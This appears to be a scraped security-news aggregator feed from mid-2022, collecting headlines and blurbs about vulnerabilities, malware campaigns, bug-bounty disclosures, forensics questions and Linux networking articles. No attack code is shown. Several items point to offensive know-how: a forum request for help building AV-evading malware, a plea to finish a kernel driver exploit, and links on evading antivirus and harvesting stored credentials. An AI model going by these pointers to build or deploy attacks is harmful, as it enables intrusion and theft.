    For cybersecurity, five years have been enough to turn the whole industry upside down; the next golden five years of development are slowly getting under way.
    Jenkins security team discloses 29 plugins affected by 0-day vulnerabilities
    The Jenkins security team has disclosed dozens of flaws affecting 29 plugins for the Jenkins automation server, most of which have not yet been fixed.
    Microsoft has found the Raspberry Robin worm in hundreds of networks
    Microsoft recently found the Raspberry Robin worm in the networks of hundreds of organizations across many industries.
    FreeBuf Morning Report | TikTok’s China-based employees can access some non-sensitive US user data; HackerOne employee “steals from the till”
    TikTok CEO Shou Zi Chew said that non-US employees, including employees in China, will be able to access a small amount of non-sensitive TikTok US user data.

    NAPALM FTP Indexer
    submitted by /u/thiskeepsmeupatnight

    Kubeclarity – SBOM and Vulnerability Detection
    Article URL: https://sectool.co/blog/kubeclarity-sbom-vulnerability-detection Comments URL: https://news.ycombinator.com/item?id=31970937 Points: 2 # Comments: 0
    A HackerOne Employee Stole Vulnerability Reports from Security Researchers
    Article URL: https://www.pcmag.com/news/a-hackerone-employee-stole-vulnerability-reports-from-security-researchers Comments URL: https://news.ycombinator.com/item?id=31970622 Points: 9 # Comments: 1

    Geolocation #3— Finding Shoigu
    On 26th June 2022, several videos appeared on Twitter showing Sergei Shoigu, the Minister of Defence of the Russian Federation, reportedly… Continue reading on Medium »
    Good News Roundup: the OSINT-inspired Geek Edition
    In good news, OSINT explains Ukraine’s latest victories, Africa uses AI to track locusts, and BirdNet successfully IDs birds by their songs Continue reading on Medium »
    Pantellica’s Inaugural OSINT Championship
    We’re excited to announce the launch of our inaugural OSINT Championship. This initiative is yet another unique pioneering effort by… Continue reading on Medium »
    SPY NEWS: 2022 — Week 26
    Summary of the espionage-related news stories for the Week 26 (June 26-July 2) of 2022. Continue reading on Medium »

    nday exploit: netgear orbi unauthenticated command injection (CVE-2020-27861)
    submitted by /u/0xdea
    Bypassing Firefox's HTML Sanitizer API
    submitted by /u/digicat
    Code replay attack on the myGovID Scheme
    submitted by /u/Gallus

    House of Gods
    Worked on a new heap technique for older versions of glibc. House of Gods hijacks the thread_arena within 8 allocs and drops a shell after 10. Works for glibc < 2.27 and was tested against 2.23, 2.24, 2.25 and 2.26. Currently trying to adapt this technique (or parts of it at least) to recent versions of glibc. But I have yet to find a way. If you have further ideas/improvements, let me know :) https://github.com/Milo-D/house-of-gods/blob/master/HOUSE_OF_GODS.TXT Same repo contains a small PoC. submitted by /u/__milo21
    Need help restoring execution after stack overflow in Windows kernel
    I'm currently trying to exploit a driver. I was able to perform a stack overflow and execute my shellcode after disabling SMEP, but it's causing a BSOD just after executing the shellcode due to the registers and stack being corrupted. I read many articles trying to understand how to restore execution after executing the shellcode but couldn't find any success. I would really appreciate it if someone could help guide me through this one. If you can help me, please shoot me a PM. Thanks submitted by /u/DudewithCoolusername

    SecWiki News 2022-07-03 Review
    No news updated today. For more of the latest articles, visit SecWiki

    A swag for an Open Redirect — Google Dork — Bug Bounty
    Hello Folks 👋, I have found a good open redirect with my param scanner. I will tell you here how I found it and what kind of swag I got… Continue reading on InfoSec Write-ups »
    DNS in Active Directory
    No content preview

    How to become a red team operator
    What is a Red Team? Continue reading on Medium »

    What do you think is lacking in the industry nowadays?
    This may be too vague of a topic, but for those who have been in the field a while, what do you wish existed that would make your job easier/better? What do you wish you had when you were first starting out? Whether it be research, training, resources, what are some things that would benefit the DFIR world for veterans and newcomers alike? submitted by /u/Corrsta

    Purple Team | Importance and Strategical Execution of Defense
    Purple Team is a group of cybersecurity experts who play the roles of the Blue and Red Teams in a cybersecurity exercise in order to… Continue reading on Medium »

    A roadmap for a beginner exploit dev/security research
    Hello everyone, so I'm just trying to find an ideal roadmap. I've been playing CTFs and solving pwn challenges and stuff, so now I want to move away from the basics and get into some real targets. So what do you guys think: should I focus on something like routers and cheap IoT devices and try to find vulns in those and try to somehow get internships/jobs based on that, or should I try to focus on something like browser exploitation (which I'm interested in) and get more knowledge of browsers and stuff and try to find bugs in them (which might take a long time and find low-impact bugs as compared to something like routers/IoT devices, which might be more difficult)? submitted by /u/MrXy0nixOG

    SecWiki News 2022-07-02 Review
    afrog is a high-performance, fast and stable vulnerability scanner with customizable PoCs, by 胖胖的ALEX; BlueHound - a self-developed host threat hunting tool, by ourren; Notes on setting up Jira and related exploitation, by ourren; A brief look at Shiro CVE-2022-32532, by ourren; Implementing JARM fingerprint randomization, by ourren. For more of the latest articles, visit SecWiki

    Insufficiently protected credentials vulnerability fixed in curl 7.83.0
    Article URL: https://packetstormsecurity.com/files/cve/CVE-2022-27776 Comments URL: https://news.ycombinator.com/item?id=31959958 Points: 1 # Comments: 0

    Linux Forensics
    Good morning, Does anyone have any recommendations on books for Linux Forensics? What about learning resources in general? Happy weekend and happy learning. submitted by /u/DeadBirdRugby

    Day to Day activities of an Azure admin
    Hi Team, If there are any Azure administrators in this group who have shifted their career from a Windows Administrator role, I just want to know what real-time day-to-day activities you are performing in your organization on the Azure portal as an Azure admin, like application registration, VM provisioning, etc. submitted by /u/Krish03101991

    Federated editing allows iframing possibly malicious remotes
    Nextcloud disclosed a bug submitted by rtod: https://hackerone.com/reports/1210424 - Bounty: $100

    Fuzzing in Go
    Running fuzz tests in Go Continue reading on Go Recipes »

    Bulk Analysis of Cobalt Strike’s Beacon Configurations
    submitted by /u/DLLCoolJ

    Linux Network Stack: Principles, Monitoring and Tuning: Preface
    This post tries to introduce the kernel 5.10 network stack from the angle of engineering R&D and practice (rather than pure theoretical study), in three aspects: principles and implementation, monitoring and alerting, and configuration tuning. Because there is a lot of content, it is split into a series of articles. Principles and implementation: Linux Network Stack: Principles, Monitoring and Tuning: Preface; Linux Interrupts (IRQ/softirq) Basics: Principles and Kernel Implementation; Linux Network Stack Receiving Data (RX): Principles and Kernel Implementation; Linux Network Stack Sending Data (TX): Principles and Kernel Implementation (TBD). Monitoring: Monitoring Linux Network Stack. Tuning: Linux Network Stack Receiving Data (RX): Configuration Tuning; Linux Network Stack Sending Data (TX): Configuration Tuning (TBD). As R&D engineers working on networking, virtualization, stability and the like, we constantly run into all kinds of network problems. By the famous 80/20 rule, 80% of these problems are routine and get solved through system or service logs, past experience, or a Google or StackOverflow search; the time taken ranges from minutes to a few hours. The remaining 20% cannot be located and fixed quickly and need some extra expertise and time to investigate, for example skimming some related code, or raising the suspicious points with the community or on a mailing list; the time taken ranges from hours to days. Applying the 80/20 rule once more to that 20%, 80% of those (20% * 80% = 16%) can be solved with a few hours or days of reading code, testing or community help, and the remaining 20% (20% * 20% = 4%) need much deeper digging before the problem can even be located. If you like, you can keep applying the 80/20 rule; after the third round what remains is 0.8%, a long tail that is small enough, but the time spent solving these problems is generally correspondingly long. For this part of the (performance) problems, we have to study the whole network stack systematically and understand the entire path a packet takes after it arrives at the NIC: which modules it passes through and what processing it receives, until it is finally picked up by the application. There is no shortcut, unless your business side can tolerate that long tail, or you can engineer around these problems, for example by the simplest means of adding machines to lower the load. But in the cloud-native era, with networks being programmable, functional requirements likewise demand domain knowledge of the kernel network stack. For example, K8s uses a very flexible spec & impl design: it describes, as a contract, what many k8s features should look like, and leaves the concrete implementation to developers or vendors. Two network-related examples: ServiceIP abstracts an L4 load balancing scheme; how and with what technology it is implemented is entirely up to the networking solution. NetworkPolicy abstracts an L3/L4 access control scheme; how and with what technology it is implemented is likewise entirely up to the networking solution. If you had to implement these two (as demos), what networking knowledge do you think you would need? Which modules and subsystems of the network stack would you need to be familiar with, and to what depth? Two references: Cracking Kubernetes Node Proxy (aka kube-proxy); Cracking Kubernetes Network Policy. With a complete understanding of kernel networking you will discover a whole new world, and you will also see the many layers of “80” problems above in an entirely different light. The earlier Linux network stack monitoring and tuning: receiving data (2016) is, for many reasons, of less and less reference value today: the kernel and NIC driver are too old (kernel 3.13, the igb driver for a 1Gbps NIC); for container and network virtualization teams in particular such a configuration is an antique; it is all text with no figures, which is very hard to follow (the original author later published a companion illustrated version, but it has only a few figures and is also too old by now); monitoring and tuning content is mixed into the code analysis, somewhat messy and not quickly searchable, and some tuning advice is outdated; it does not show how to visualize core metrics with a reasonably modern monitoring stack such as Prometheus+Grafana; … This post follows the main line of that article but reorganizes the whole network stack processing flow and some monitoring and tuning options on a new kernel: kernel 5.10, with a Mellanox 25Gbps NIC using the mlx5_core driver; it adds more than twenty flow charts and call stacks of the core modules, which are more intuitive and help clarify the main line; it splits monitoring and tuning into separate parts for quick lookup and reference, avoiding jumping back and forth between trivial details, and updates some tuning advice according to the kernel version and production experience; it shows how to monitor network metrics with a modern monitoring system; and it adds a suitable amount of content that has appeared in recent years, such as BPF/XDP. This post is about the “Linux networking stack”, where “stack” means not just the kernel protocol stack but the entire path, including the kernel protocol stack, from a packet arriving at the physical NIC to it finally being picked up by a user-space program, as shown in the figure below (receive path and steps): Fig. Steps of Linux kernel receiving data process and the corresponding chapters in this post. This post still has many incomplete parts and may contain some errors; it is for study reference only and will be updated from time to time.
    Linux Network Stack Receiving Data (RX): Configuration Tuning
    This post tries to introduce the kernel 5.10 network stack from the angle of engineering R&D and practice (rather than pure theoretical study), in three aspects: principles and implementation, monitoring and alerting, and configuration tuning. Because there is a lot of content, it is split into a series of articles. Principles and implementation: Linux Network Stack: Principles, Monitoring and Tuning: Preface; Linux Interrupts (IRQ/softirq) Basics: Principles and Kernel Implementation; Linux Network Stack Receiving Data (RX): Principles and Kernel Implementation. Monitoring: Monitoring Linux Network Stack. Tuning: Linux Network Stack Receiving Data (RX): Configuration Tuning. 1 Network device driver initialization 1.1 Adjusting the number of RX queues (ethtool -l/-L) 1.2 Adjusting RX queue size (ethtool -g/-G) 1.4 Adjusting RX queue weights (ethtool -x/-X) 1.5 Adjusting the RSS RX hash fields (ethtool -n/-N) 1.6 Binding flows to CPUs: ntuple filtering (ethtool -k/-K, -u/-U) 2 NIC receives packets 3 DMA copies packets into the RX queue 4 IRQ 4.1 Interrupt coalescing (ethtool -c/-C) 4.2 Adjusting hard interrupt affinity (IRQ affinities, /proc/irq//smp_affinity) 5 SoftIRQ 5.1 Discussion: the NAPI poll mechanism; tracing IRQ/softirq calls with perf; the fields of /proc/net/softnet_stat 5.2 Adjusting the softirq receive budget: sysctl netdev_budget/netdev_budget_usecs 6 softirq: moving packets from the ring buffer into the protocol stack 6.1 Changing the GRO configuration (ethtool -k/-K) 6.2 sysctl gro_no…
    Linux Network Stack Receiving Data (RX): Principles and Kernel Implementation
    Fig. Steps of Linux kernel receiving data process and the corresponding chapters in this post. This post tries to introduce the kernel 5.10 network stack from the angle of engineering R&D and practice (rather than pure theoretical study), in three aspects: principles and implementation, monitoring and alerting, and configuration tuning. Because there is a lot of content, it is split into a series of articles. Principles and implementation: Linux Network Stack: Principles, Monitoring and Tuning: Preface; Linux Interrupts (IRQ/softirq) Basics: Principles and Kernel Implementation; Linux Network Stack Receiving Data (RX): Principles and Kernel Implementation; Linux Network Stack Sending Data (TX): Principles and Kernel Implementation (TBD). Monitoring: Monitoring Linux Network Stack. Tuning: Linux Network Stack Receiving Data (RX): Configuration Tuning; Linux Network Stack Sending Data (TX): Configuration Tuning (TBD). 0 A bird’s-eye view of the receive (RX) process 1 NIC driver initialization 1.1 A few things about Mellanox NIC drivers 1.2 Driver module registration: module_init() -> init() -> pci/mlx5e init 1.3 PCI-related initialization 1.3.1 PCI driver list registration: pci_register_driver() 1.3.2 The kernel searches for and loads a driver for the NIC: pci_driver->probe() call stack and flow chart; initializing devlink: mlx5_devlink_alloc(); initializing debugfs and some WQs: mlx5_mdev_init(); initializing the PCI-related parts: mlx5_pci_init(); initializing hard interrupts (IRQ) and setting the NIC state to UP: mlx5_load_one() 1.4 Ethernet-related initialization: mlx5e_init() …
    Linux Interrupts (IRQ/softirq) Basics: Principles and Kernel Implementation
    1 What is an interrupt? 2 Hard interrupts 2.1 Interrupt handling flow 2.2 Maskable and non-maskable 2.3 Problem: must execute fast enough vs. fairly complex logic 2.4 Solution: deferred interrupt handling 3 Soft interrupts 3.1 The softirq subsystem 3.2 Main processing 3.3 Preventing softirqs from hogging the CPU 3.4 Hard interrupt -> soft interrupt call stack; the steps by which a softirq is triggered and run 4 Three ways of deferring work (softirq/tasklet/workqueue) 4.1 Internal organization of softirq; triggering (waking) a softirq 4.2 tasklet 4.3 workqueue: use cases; structures; References. One of the important use cases of interrupts (IRQ), and especially soft interrupts (softirq), is network packet reception and transmission, but it is not the only one. This post collects the general IRQ/softirq basics, which have no direct relationship to sending and receiving packets, although the direct purpose of writing it is to better understand packet reception and transmission. 1 What is an interrupt? The CPU handles many tasks through time-division multiplexing, including hardware tasks such as disk reads/writes and keyboard input, and software tasks such as network packet processing. At any moment, one CPU can only handle one task. When some hardware or software task is not currently being executed but wants the CPU to handle it immediately, it sends the CPU an interrupt request: it wants the CPU to stop what it is doing and serve “me” first. Interrupts notify the CPU in the form of events, which is why we often see statements like “under condition XX, interrupt event XX is triggered”. Two types: interrupts produced externally or by hardware, such as a key press; interrupts produced by software, and interrupts produced by exceptional events, such as division by zero. The device that manages interrupts: the Advanced Programmable Interrupt Controller (APIC). 2 Hard interrupts 2.1 Interrupt handling flow Interrupt…

    Distros and RegRipper, pt deux
    Now and again I pop my head up and take a look around to see where RegRipper has been, and is being, used. My last blog post on this topic had quite a few listings, but sometimes changing the search terms reveals something new, or someone else has decided to use RegRipper since the last time I looked. References to RegRipper go way back, almost as far as RegRipper itself (circa 2008): SANS blog (2009) SANS blog (2010) SANS Infosec Handler's Diary blog (2012) Kali Tools (RR v2.5) SANS Blog, Mass Triage, pt 4 (2019) The latest commercial forensics platform that I've found that employs RegRipper is Paraben E3. I recently took a look at the evaluation version, and found "rip.pl" (RegRipper v3.0 with modifications) in the C:\Program Files\Paraben Corporation\Electronic Evidence Examiner\PerlSmartAnalyzer folder, along with the "plugins" subfolder. You can see the Registry parsing in action and how it's incorporated into the platform at the Paraben YouTube Channel: AppCompatCache parsing Reviewing Data from AmCache Reviewing the videos, there's something very familiar about the output illustrated on-screen. ;-) Other Resources (that incorporate RegRipper) YouTube video by Ric Messier CAINE forensics video PacktPub Subscription LIFARS Whitepaper on Shellbags Windows Registry Forensics, 1/e (PDF) Paradigm Solutions blog Jason Shaver's NPS thesis (2015) That's just one more step toward world domination! This is where I tent my fingers and say "Excellent" like Mr. Burns! PS: While I was looking around recently, I saw something I hadn't seen before... early in Jan, 2020, an issue with the Parse::Win32Registry module parsing 64-bit time stamps was identified. I'd updated the module code, recompiled the EXEs, and put them up on GitHub. I found recently that James, the author of the module, had updated it in Sept, 2020. That's great, but there are a few other tweaks I'd made to the code, one that allowed me to check to see if hives are 'dirty'.

    GitLab Remote Code Execution Vulnerability (CVE-2022-2185)
    GitLab remote code execution vulnerability: the issue affects all versions from 14.0 to 14.10.5, from 15.0 to 15.0.4, and from 15.1 to 15.1.1, where an authorized user can import a maliciously crafted project, leading to remote...

    What is being a malware analyst like?
    What is being a malware analyst like? How many hours do you guys work? Is it stressful? What certificate do I need to become a malware analyst? submitted by /u/ELIDAL99
    Email/Password vs Social Login vs Passwordless (magic links), which one is most vulnerable and how to choose the best strategy for users
    As a developer of a user authentication library, I get asked this question a lot. This is definitely a subjective question and I struggle to answer it appropriately other than saying "it depends". So I want to open up this question to this knowledgeable community for opinions on how developers can choose the right authentication strategy for their users. Your experience as NetSec can be really valuable in educating developers. You don't need to answer everything, just pick one aspect and share your thoughts. By the end of the discussion, we will have a useful conversation that developers can learn from. submitted by /u/10xpdev
    SANS SEC 560 Class Notes by Jeff McJunkin
    Found this old tweet from Jeff McJunkin for his SANS SEC560 class in Minneapolis. https://twitter.com/jeffmcjunkin/status/755395680194039808 I thought it might be useful to the infosec community, especially to those who are planning to take this exam. You can find the doc here. https://docs.google.com/document/d/19qp1aLg8LG8_lT0a-R-ilXIq0rCXKAR011Nj1pVo5TI/edit Not sure if he keeps updating this doc or not since he tweeted this 6 years ago. If you happen to know, let me know. Thanks submitted by /u/w0lfcat

    June 2022 Incident Report
    HackerOne disclosed a bug submitted by jobert: https://hackerone.com/reports/1622449
    Unauthorized Access - downgraded admin roles to none can still edit projects through Burp Suite
    Omise disclosed a bug submitted by zombieesshx: https://hackerone.com/reports/1607756

    Any idea what's going on here?
    Found this in a Google search: http://82.146.38.215/text/ Appears to be arrays of text snippets randomly collected and loosely related to the subject implied by each filename. In the middle of a file on customer complaints, there appears to be text from websites about cookie policies, which makes me think this is randomly collected. Do these look like fragments to form random text at the end of spam messages? Phrases for training a neural network? Something else? Just curious. submitted by /u/CommanderPowell
    Not sure what this is -- Modules. Maybe someone could explain.
    submitted by /u/brother_p
    Incel 101
    submitted by /u/brother_p
    solar panel wiring diagrams and manuals
    submitted by /u/PM_ME_TO_PLAY_A_GAME
    Just found this
    submitted by /u/thiskeepsmeupatnight
    wget (maybe) help?
    Hi. Newb here. Not exactly OD related, buuuut I was wondering if someone could share a wget script, app, link or anything of the sort to help me download some files. The site's not online anymore, but I can access the files (.jpgs) via the Wayback Machine. An example URL would be something like http://superkewlfictionalwebsite.com/pics/superkewlpic.jpg Or https://web.archive.org/web/2014*/http://superkewlfictionalwebsite.com/pics/superkewlpic.jpg Many thanks in advance submitted by /u/bweezy320

    War in Ukraine / June 30
    Russia left Snake Island. It seems completely Continue reading on Medium »

    SecWiki News 2022-07-01 Review
    No news updated today. For more of the latest articles, visit SecWiki

    Building a scalable static analysis program at Razorpay
    submitted by /u/jubbaonjeans
    Intel SGX deprecation review
    submitted by /u/hardenedvault
    It’s Been Zero Days Since BIND9 Crashed
    submitted by /u/jen140

    IW Weekly #5: Account Takeover, Recon, Ransomware Creation, and more.
    No content preview
    Let’s Understand SSRF vulnerability
    Introduction Continue reading on InfoSec Write-ups »

    FreeBuf Weekly | The “Regulations on the Administration of Internet User Account Information” take effect on 1 August; former Canadian government employee took part in ransomware attacks
    With the approval of the Cybersecurity Review Office, BOSS Zhipin, Yunmanman and Huochebang have resumed new user registration.
    Black Basta ransomware distributed via QakBot
    Since becoming operational in April 2022, Black Basta has attacked nearly 50 organizations worldwide. The attackers use a “double extortion” strategy: if a victim does not pay the ransom, its data is published.
    Revive: from spyware to banking trojan
    In June 2022, Cleafy researchers discovered a new Android banking trojan, Revive.
    “Tophant Attack-Defense Exercise Handbook”: detecting red team covert tunnels
    象守 combines static covert-tunnel signatures with a covert-tunnel model so that covert tunnel communication attacks have nowhere to hide.
    How to “defend against phishing” during attack-defense exercises | FreeBuf Party A group discussion
    During HVV, phishing techniques in practice can take all kinds of forms; what detection and defense measures are available? And in phishing drills, which strategies effectively test employees’ security awareness?
    BlueHound - a self-developed host threat hunting tool
    BlueHound is a GUI host threat hunting tool. It supports on-host/offline scanning for webshells, scanning for CobaltStrike beacon programs, and memory scanning, and is built on .NET 4.6.
    Enterprise security building | Reflections on the practical journey of information security building
    When enterprises plan their information security program, the “defense in depth” architecture has become the reference applicable to most of them; guided by that idea, in order to build a complete security protection system and keep improving protective capability, top-level architecture design and comprehensive planning of information security work is the first priority.
    Aimed straight at Word attachments: the AstraLocker 2.0 ransomware arrives!
    Recently, a little-known ransomware called AstraLocker released its second major version.
    Malware uses the API Hammering technique to evade sandbox detection
    Researchers found a new implementation of the API Hammering sandbox-evasion technique in recently discovered Zloader and BazarLoader samples.
    MuddyWater keeps targeting the Middle East
    MuddyWater is believed to be a group operated by Iran’s Islamic Revolutionary Guard Corps, mainly serving Iran’s national interests.
    FreeBuf Consulting × Vulbox jointly release the “2022 Cybersecurity Attack and Defense View”
    The CSAD view comprises a cross-industry cybersecurity attack path map, a cross-industry cybersecurity defense path map, an environment security layout map, and a security operations team building map.

    Learn about Docker Container Security in Detail
    Are you looking for a series of posts that take a deep look at containers from an information security perspective? In my blog's "Docker Container Security" series, I've got you covered. https://tbhaxor.com/docker-containers-security/ submitted by /u/tbhaxor
    How to get started with malware development?
    Hi, I want to get started with malware development. I am familiar with Python, C/C++ and asm32. I want to learn to build my own malware (complete control with the Win32 API) and a C2 framework. I recently finished asm and made my own shellcode encoder that brought the detection rate down from 11 to 3. I want to build malware with AV and EDR bypassed. I have just started learning about the Win32 API, but it feels like I'm missing a lot of concepts like handles, TCHARs etc. which I don't know about. There are just so many things to learn like the Win32 API, process injection etc., and I have no idea where to start. Any help suggesting an ideal pathway would be really helpful. submitted by /u/Horse-Trojan
    Free Course online: Introduction to Cybersecurity by Cisco Networking Academy
    submitted by /u/cybersocdm

    What's the difference between a logical copy and a physical copy in a Windows forensics image?
    What are the main targets between them? submitted by /u/ArticleUseful211

    Feishu / Lark Data Extraction
    Has anybody dealt with Feishu/Lark before? I need to export files and chat conversations and none of my tools (Axiom, Cellebrite) are capable of extracting the data. submitted by /u/Markarov_93
    How can I create my own tool to acquire RAM memory?
    Hi community … I want to build a tool like Belkasoft RAM Capturer … But I'm not getting any idea about how to capture RAM via C or Python … Any suggestions would be great … thanks in advance submitted by /u/Aromatic_Ideal_2933
    Data recovery on a Lumia 550
    Internal data recovery in MSFT LUMIA 550, no SD card. Hey, I have been given a MSFT Lumia 550 to try and recover the internal data that has been lost but am not having any luck. I run Windows and Linux, and have data recovery software for phones and Windows, but it is not showing on either one. It shows in the file explorer but not in Disk Management or AOMEI Partition Assistant. Screen works and no other issues. If anyone could advise or point me in the right direction it would be great. Device information Model: Microsoft Lumia 550 19:43 Service provider: 02 Software: Windows 10 Mobile Installed RAM: 1 GB Version: 1709 OS build: 10.0.15254.527 Firmware revision number: 01078.00042.16352.50009 Hardware revision number: 3.0.0.1 Radio software version: 10c56.00030.0001 Chip SOC version: 8909 Screen resolution: 720x1280 submitted by /u/sudo_oth
    Time Machine encrypted with FileVault 2 won't accept known password.
    History: MacBook 15" Samsung 1TB AHCI SSD died, non recoverable (S4LN058A01 controller not supported in PC3000, degraded memory, corrupted firmware/bad bytes...), won't ID, any interaction with it will stay in BSY mode, won't clone. The only hope now was the Time Machine backup (FileVault 2). This is with Monterey OSX. Time Machine backup is 1.5TB in iSCSI format, but I cloned it to a .img format to work with it now. I must say this backup was used every day, and it would mount automatically when logged into the computer. There were two users, user1 and user2, both with the same password. Both admin. Password has been the same for years, but suddenly Time Machine won't mount, saying credentials are incorrect. I have seen this scenario happen to a lot of people over the years. There is also…

    Advice on SEC599 vs SEC699
    Hi there, I'm seeking advice for a SANS course (or similar; money being no object for a single course). I did SEC555 a while ago but I'm not really into setting up SIEM anymore, more focused on devising new detection rules (that colleagues will be implementing). I'm very much "blue", not really into pure red courses/exams like OSCP or GPEN, but am interested in purple, but my main driver is to learn new stuff as much as possible. We have fairly mature SIEM(s) with existing rules, and people reviewing and/or thinking about new ones. I'm already familiar with MITRE ATT&CK and started prioritizing techniques for my domain of interest. What I'm looking for is a course that would bring the most value to my team, new ideas or ideas that we didn't think about, challenging the MITRE techniques prioritization, etc. I've looked at both 599 and 699 (even the 599 vs 699 FAQ on the SANS website) but can't decide... haven't found many reviews for 699. I wonder how much of 599 will be a refresh for me. I've also considered FOR572 because I've always wanted to do it, and we don't do much with the flows... I think we could get some low hanging fruits there (an NDR solution is being set up). Any advice or experience you can share is welcome, thanks! submitted by /u/FreshGap5328
    What should be checked to give network access from internal to external IP?
    Hello. I wonder how this happens in other companies. Perhaps you could share your experiences. Often I am asked by devs to change or create the firewall rules for their dev needs. Sometimes, it's hard for me to know how safe it is. If the request is from internal to external: 1) I'm checking to see if there are vulnerabilities on my machine that will have access to the external IP. 2) I'm checking with SSL checkers the encryption status of the external IP/URL. 3) I always ask to be given more specific IP ranges and ports. What kind of playbooks do you have? submitted by /u/athanielx

    Flubot: the evolution of a notorious Android Banking Malware
    submitted by /u/Goovscoov
    RanSim: a ransomware simulation script written in PowerShell. Useful for testing your defenses and backups in a controlled simulation. The same script is used for encryption and decryption.
    submitted by /u/doctormay6
    Weaponizing and Abusing Hidden Functionalities Contained in Office Document Properties
    submitted by /u/McLabraid
    Cloudy with a Chance of Risk: Managing Risks in Cloud-Managed OT Networks
    submitted by /u/c_f13
    How to expose a potential cybercriminal due to misconfigurations
    submitted by /u/CyberMasterV
    Starting an AppSec program the simple way
    submitted by /u/theappsecteam
    Golang code review notes by elttam
    submitted by /u/Gallus

    What Does Zero-Day Vulnerability Mean?
    Article URL: https://pacgenesis.com/what-does-zero-day-vulnerability-mean/ Comments URL: https://news.ycombinator.com/item?id=31938463 Points: 1 # Comments: 0

    GitHub - lawndoc/RanSim: Ransomware simulation script written in PowerShell. Useful for testing defenses and backup in a controlled setting. The same script and key is used for decryption.
    submitted by /u/doctormay6
    New Offsec post: Weaponizing and Abusing Hidden Functionalities Contained in Office Document Properties
    TJNull posted this a few hours ago on the Offensive Security Blog; it seems to utilise macros within Office to gain leverage, seems pretty cool. It's called "Weaponizing and Abusing Hidden Functionalities Contained in Office Document Properties". Tweet: https://twitter.com/TJ_Null/status/1542507690441682945?t=aa7IB9DN9CAddzT-Wc7Kmg&s=19 Article: https://www.offensive-security.com/offsec/macro-weaponization/ Also a proof of concept. Proof of concept: https://m.youtube.com/watch?v=8ZePZzdVQT8&feature=emb_logo submitted by /u/McLabraid
    Toll fraud malware: How an Android application can drain your wallet
    submitted by /u/SCI_Rusher
    Harvesting Browser Passwords from Windows Credential Vault — Mimikatz
    submitted by /u/Clement_Tino

    What are the most essential third-party risk management tools?
    Vulnerabilities in the supply chain may cause cyberattacks. It also means that the concerns or vulnerabilities in the supply chain may… Continue reading on Medium »
    Which company provides the best penetration testing services?
    At times, it may not be that easy to approach the best pen testing services. The market is full of unqualified professionals, misleading… Continue reading on Medium »
    Which company provides the best red team security consulting?
    It is not a straightforward question to answer as there are many established companies, which provide red team security assessment… Continue reading on Medium »
    HOW I HACKED A HEALTH INSTITUTION [Domain Admin Compromise]
    Hello everyone, today I will be bringing you a new war-story of mine that had just wrapped up in the recent months. At a high level, I was… Continue reading on Medium »
    Relaying NTLM Authentication from SCCM Clients
    tl;dr: Seriously, please disable NTLM Continue reading on Posts By SpecterOps Team Members »
  • Open

    Open redirect found on account.brave.com
    Brave Software disclosed a bug submitted by tabaahi: https://hackerone.com/reports/1338437 - Bounty: $300
    Arbitrary file download via "Save .torrent file" option can lead to Client RCE and XSS
    Brave Software disclosed a bug submitted by d3f4u17: https://hackerone.com/reports/963155 - Bounty: $200
    Arbitrary file download due to bad handling of Redirects in WebTorrent
    Brave Software disclosed a bug submitted by d3f4u17: https://hackerone.com/reports/975514 - Bounty: $150
    Redirecting users to malicious torrent-files/websites using WebTorrent
    Brave Software disclosed a bug submitted by d3f4u17: https://hackerone.com/reports/968328 - Bounty: $200
    Browser is not following proper flow for redirection cause open redirect
    Brave Software disclosed a bug submitted by abhinavsecondary: https://hackerone.com/reports/1579374 - Bounty: $500
  • Open

    OSINT and Public Administration (again)
    A few (brief) thoughts, completely off the cuff. Continue reading on Medium »
    War in Ukraine / June 29
    The oil embargo has not yet produced visible results Continue reading on Medium »
    Dispelling Russian Lies About the Missile Strikes in Kremenchuk
    On June 27th, 2022, two Kh-22 anti-ship missiles outfitted with upwards of 1,000kg of explosives struck targets in Kremenchuk, Ukraine. Continue reading on Medium »
  • Open

    Choosing your job role in cybersecurity
    No content preview
    All About String in Python
    No content preview
  • Open

    SecWiki News 2022-06-30 Review
    No news updated today. For more of the latest articles, visit SecWiki
  • Open

    Model ww2 things
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
  • Open

    6/30 XSS study log
    CORS Continue reading on Medium »

  • Open

    Securing mobile phones and apps, What endpoint solutions are you using?
    Hey everyone, currently working as a security admin at a mid-sized company. Lately I’ve been looking into different mobile phone security for our BYOD policy. As everyone knows, there’s been a bunch of phishing, OS exploits, and hacks on Instagram, which is primarily what our marketing team uses. My main concern being the phishing links or exploits that prevent the use of Instagram. I’ve already created visuals and ran the company through steps to ensure their safety when using the apps (Not clicking random links, sketchy links, giving out passwords, etc) but human error exists and I don’t want to be the one at fault if there’s an issue. Curious to know what everyone’s using at their companies, I’m looking beyond just VPN solutions as I feel we need something more secure and reliable like a full endpoint security system. So far I’ve been looking at Lookout, Check Point, and CrowdStrike, mainly because of their file protection systems in addition to apps, etc. Let me know! submitted by /u/psaiful28 [link] [comments]
    Creating Proxy like Burpsuite / ZAP Proxy
    Hi, any guide on creating tools like Burpsuite or Zap Proxy specifically the intercept module and the logger. I need to capture all the request including the HTTP Headers, request parameters and more Main Problem I already have a simple GUI Form (Java) literally GUI form without any functionality but I don't know how to get the request. If I remember correctly, during the installation of Burpsuite, the user should install a .cert file, should I also generate that one for my program? Thanks! submitted by /u/pldc_bulok [link] [comments]
  • Open

    Cryptographic failures in RF encryption allow stealing robotic devices | Cossack Labs
    submitted by /u/evilsocket [link] [comments]
    Exploiting Intel Graphics Kernel Extensions on macOS to Escape the Safari Sandbox
    submitted by /u/gaasedelen [link] [comments]
    CloudGoat detection_evasion Scenario: Avoiding AWS Security Detection and Response
    submitted by /u/hackers_and_builders [link] [comments]
    CVE-2022-28219: Unauthenticated XXE to RCE and Domain Compromise in ManageEngine ADAudit Plus
    submitted by /u/scopedsecurity [link] [comments]
    How to Steal Browser’s Autofill Credentials via Cross-Site Scripting (XSS)
    submitted by /u/obilodeau [link] [comments]
    How to Evade Windows Defender and Commercial AV with Msfvenom Payloads
    submitted by /u/entropydaemon6 [link] [comments]
  • Open

    OAuth Misconfiguration Leads To Pre-Account Takeover
    No content preview
    IW Weekly #4: BITB Attack, Hackthebox Walkthrough, Twitter Link Takeover, and more.
    No content preview
    Text Based Injection | Content Spoofing on ISRO Website
    No content preview
  • Open

    [Security Advisory] Apache Shiro permission bypass vulnerability (CVE-2022-32532)
    In Apache Shiro versions before 1.9.1, using RegExPatternMatcher with a regular expression containing "." may lead to a permission bypass. The vulnerability stems from the fact that, in the regex matching RegExPatternMatcher uses by default, "." does not match newline...
  • Open

    SecWiki News 2022-06-29 Review
